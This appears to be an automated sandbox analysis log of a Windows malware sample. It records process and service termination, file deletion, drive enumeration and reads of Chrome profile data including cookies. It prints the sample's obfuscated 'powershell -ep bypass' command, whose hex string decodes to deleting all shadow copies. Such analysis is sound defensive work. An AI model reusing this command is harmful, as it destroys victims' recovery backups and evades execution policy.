Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap,

0_2_00CE57E5

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap,

0_2_00CE4C7B

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: GetAdaptersInfo,RtlAllocateHeap,GetAdaptersInfo,inet_addr,RtlFreeHeap,

0_2_00CE6F46

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6102			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3111			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208	Thread sleep count: 6102 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852	Thread sleep count: 3111 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,	0_2_00CE5490
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap,	0_2_00CE67AD
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose,	0_2_00CE525B
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose,	0_2_00CE5368

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy,

0_2_00CE51E6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome	Jump to behavior

Source: powershell.exe, 00000006.00000003.279613000.00000165FE227000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules,

0_2_00CE380C

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

0_2_00CE57E5

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE7E49 mov eax, dword ptr fs:[00000030h]	0_2_00CE7E49
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE7E53 mov eax, dword ptr fs:[00000030h]	0_2_00CE7E53
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	Code function: 0_2_00CE1F0F mov eax, dword ptr fs:[00000030h]	0_2_00CE1F0F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy

Show sources

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Code function: 0_2_00CE301C ImpersonateLoggedOnUser,GetUserNameW,GetComputerNameW,RtlAllocateHeap,_swprintf,RtlReAllocateHeap,RtlFreeHeap,RtlFreeHeap,RevertToSelf,

0_2_00CE301C

Source: C:\Users\user\Desktop\rUUR0qQI22.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\58ea1f927c503c2b_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5febb783fe057117_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\181db4280bb3db70_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\NULL	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\244f905c10de3c26_0	Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT	Jump to behavior
